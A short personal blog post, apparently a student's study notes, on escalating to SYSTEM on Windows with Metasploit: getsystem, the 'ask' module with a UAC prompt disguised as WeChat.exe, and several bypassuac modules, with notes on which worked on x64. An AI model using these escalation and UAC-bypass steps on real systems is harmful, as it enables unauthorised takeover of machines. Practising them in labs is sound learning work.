May the epidemic end soon so we can return to campus and keep working hard
Use getsystem to obtain the highest privileges
getsystem
But it fails with the following error
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
Raise the program's run level (triggers UAC)
msf module:
use exploit/windows/local/ask
info
set session 1
show options
Set the content shown in the prompt
set filename WeChat.exe
The prompt appears; click Yes
A new session pops up
Get system privileges directly
getsystem
UAC bypass, no click needed
Using msf modules:
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
Use the first one
use exploit/windows/local/bypassuac
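I found that this module targets x86 and mine is x64, but I tried it anyway
It turned out to work
Find a newer module and try privilege escalation with the newest payload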
use exploit/windows/local/bypassuac_silentcleanup
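It didn't work. I also tried the second and third modules listed above, and they didn't work either; the system bitness does make a difference
Source: CSDN
Author: 从小白到被迫变成大白
Link: https://blog.csdn.net/qq_44902875/article/details/104717496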